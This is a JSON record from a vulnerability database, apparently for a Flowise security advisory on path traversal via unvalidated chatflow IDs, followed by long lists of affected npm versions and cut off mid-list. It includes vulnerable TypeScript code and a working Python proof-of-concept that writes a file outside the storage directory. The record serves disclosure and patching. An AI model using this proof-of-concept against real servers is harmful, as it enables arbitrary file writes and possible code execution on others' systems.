{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360549?format=json","vulnerability_id":"VCID-g7y6-euhd-jqhh","summary":"Flowise has arbitrary file access due to missing chat flow id validation\n### Summary\n\nMissing chat flow id validation allows an attacker to access arbitrary file.\n\n### Details\n\nCommit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however,  `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues.\n\n**Case 1**\n\nWhen creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data.\n\n```typescript\nexport const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => {\n    // ...\n    } else {\n        const dir = path.join(getStoragePath(), chatflowid)  // path traversal here\n        if (!fs.existsSync(dir)) {\n            fs.mkdirSync(dir, { recursive: true })\n        }\n\n        const splitDataURI = fileBase64.split(',')\n        const filename = splitDataURI.pop()?.split(':')[1] ?? ''\n        const bf = Buffer.from(splitDataURI.pop() || '', 'base64')\n        const sanitizedFilename = _sanitizeFilename(filename)\n\n        const filePath = path.join(dir, sanitizedFilename)\n        fs.writeFileSync(filePath, bf)\n        fileNames.push(sanitizedFilename)\n        return 'FILE-STORAGE::' + JSON.stringify(fileNames)\n    }\n}\n```\n\n**Case 2**\n\nWhen downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [[documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path.\n\nNote that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication.\n\n### PoC\n\nLaunch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'.\n\n```python\nimport requests\nimport json\nurl = \"http://localhost:8080/api/v1/chatflows\"\nheaders = {\"x-request-from\": \"internal\"}\nnodedata = {\n  \"category\" : \"Document Loaders\",\n  \"inputs\" : {\n    \"key\" : \"data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn\"\n  }\n}\nflownode = {\n  \"id\" : \"a\",\n  \"data\" : nodedata\n}\nflowdata = {\n  \"nodes\" : [flownode],\n  \"edges\" : [],\n  \"viewport\" : {\n    \"x\" : 1,\n    \"y\" : 1,\n    \"zoom\" : 1\n  }\n}\ndata = {\n  \"id\" : \"../../../../../tmp\",\n  \"name\" : \"name\",\n  \"flowData\" : json.dumps(flowdata)\n}\nres = requests.post(url, json=data, headers=headers)\n```\n\n### Impact\n\n1. Arbitrary file read / write\n2. Remote Code Execution\n3. Data loss","aliases":[{"alias":"GHSA-q67q-549q-p849"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/34612?format=json","purl":"pkg:npm/flowise@3.0.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6"}],"affected_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/395072?format=json","purl":"pkg:npm/flowise@2.2.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@2.2.8"},{"url":"http://public2.vulnerablecode.io/api/packages/823706?format=json","purl":"pkg:npm/flowise@3.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/34324?format=json","purl":"pkg:npm/flowise@3.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-u91w-qe9z-rfg4"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.1"},{"url":"http://public2.vulnerablecode.io/api/packages/823707?format=json","purl":"pkg:npm/flowise@3.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.2"},{"url":"http://public2.vulnerablecode.io/api/packages/823708?format=json","purl":"pkg:npm/flowise@3.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/823709?format=json","purl":"pkg:npm/flowise@3.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.4"},{"url":"http://public2.vulnerablecode.io/api/packages/34083?format=json","purl":"pkg:npm/flowise@3.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5hdy-fsnn-qfgq"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerab